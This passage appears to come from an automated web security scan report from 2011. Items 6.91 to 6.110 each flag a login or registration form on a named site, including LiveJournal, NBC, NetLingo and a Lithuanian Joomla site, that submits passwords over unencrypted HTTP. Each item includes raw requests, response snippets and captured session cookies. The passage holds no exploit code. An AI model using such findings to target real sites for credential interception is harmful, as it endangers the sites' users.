<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.91. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.92. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:34 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.93. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/70-joomla-16-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.94. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.95. http://www.lithuanianjoomla.com/joomla-sasajos.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-sasajos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-sasajos.html
The form contains the following password field:
  • password

Request

GET /joomla-sasajos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-sasajos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.96. http://www.lithuanianjoomla.com/joomla-saugumas.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-saugumas.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-saugumas.html
The form contains the following password field:
  • password

Request

GET /joomla-saugumas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-saugumas.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.97. http://www.lithuanianjoomla.com/joomla-versijos.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-versijos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-versijos.html
The form contains the following password field:
  • password

Request

GET /joomla-versijos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16049


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-versijos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.98. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /kaip-idiegti-joomla.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html
The form contains the following password field:
  • password

Request

GET /kaip-idiegti-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/kaip-idiegti-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.99. http://www.lithuanianjoomla.com/kontaktai.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /kontaktai.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/kontaktai.html
The form contains the following password field:
  • password

Request

GET /kontaktai.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17140


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/kontaktai.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.100. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /lithuanianjoomlacom-misija.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html
The form contains the following password field:
  • password

Request

GET /lithuanianjoomlacom-misija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/lithuanianjoomlacom-misija.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.101. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /lithuanianjoomlacom-vizija.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html
The form contains the following password field:
  • password

Request

GET /lithuanianjoomlacom-vizija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13484


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/lithuanianjoomlacom-vizija.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.102. http://www.lithuanianjoomla.com/naujienos.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /naujienos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/naujienos.html
The form contains the following password field:
  • password

Request

GET /naujienos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:49 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13215


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.103. http://www.lithuanianjoomla.com/saugi-joomla.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/saugi-joomla.html
The form contains the following password field:
  • password

Request

GET /saugi-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:05 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/saugi-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.104. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/saugi-joomla.html
The form contains the following password field:
  • password

Request

GET /saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/saugi-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.105. http://www.livejournal.com/update.bml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.livejournal.com/update.bml
The form contains the following password field:
  • password

Request

GET /update.bml HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=qSLA0OACBpHpEQx:1295930583:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:03 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "0d1717ff7e20cf2aa2b1705c6fb92344"
Content-length: 48142
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<td>

<form method='post' action='update.bml' id='updateForm' name='updateForm'>

<input type='hidden' name="lj_form_auth" value="c0:1295928000:2583:86400:DlmOeXnxss-0-qSLA0OACBpHpEQx:c0046ca7a6b3fea22aa5ddf3a408ecca" />
...[SNIP]...
</label>
<input type="password" maxlength="30" tabindex="6" name="password" class="text" id="altlogin_password" size="15" />
</p>
...[SNIP]...

6.106. http://www.nbc.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.nbc.com/
The form contains the following password field:
  • password

Request

GET / HTTP/1.1
Host: www.nbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Wirt: qw-p-web17.qwplatform.com
Content-Type: text/html
Cache-Control: max-age=40
Expires: Tue, 25 Jan 2011 04:47:46 GMT
Date: Tue, 25 Jan 2011 04:47:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-true=no; expires=Wed, 26-Jan-2011 04:47:06 GMT; path=/
Vary: User-Agent
Content-Length: 131845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
<div id="mynbcLoginForm">
                   <form action="#" method="post">
                   <input type="text" name="email" value="email" title="email" tabindex="1" id="globalLoginEmail"/>
                       <input type="password" class="no-margin" name="password" value="password" title="password" tabindex="2" id="globalLoginPass"/>

                       <a id="globalLoginSubmitBtn" href="javascript:void(0);" title="Submit" tabindex="3">
...[SNIP]...

6.107. http://www.netlingo.com/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.netlingo.com/login-action.php
The form contains the following password field:
  • password

Request

GET /login.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p2kggg0b9m3bnq9c57hhsvlcl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">
<form name="login" id="login" action="login-action.php" method="post">
                                <span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...

6.108. http://www.netlingo.com/register-premium.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /register-premium.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.netlingo.com/register-premium.php
The form contains the following password fields:
  • password
  • password2

Request

GET /register-premium.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 56600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">    
<form name="register" id="register" onSubmit="return false;" method="post">
<span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...
</span> <input type="password" name="password2" id="password2" class="inputBoxLarge" /><br />
...[SNIP]...

6.109. http://www.netlingo.com/register.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.netlingo.com/register.php
The form contains the following password fields:
  • password
  • password2

Request

GET /register.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=sb796kqmjk5b811eau65ljq195; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div id="form" class="left">    
<form name="register" id="register" onsubmit="return false;" method="post">
<span class="label">
...[SNIP]...
</span> <input type="password" name="password" id="password" class="inputBoxLarge" /><br />
...[SNIP]...
</span> <input type="password" name="password2" id="password2" class="inputBoxLarge" /><br />
...[SNIP]...

6.110. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html
The form contains the following password field:
  • upass

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:03:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120158

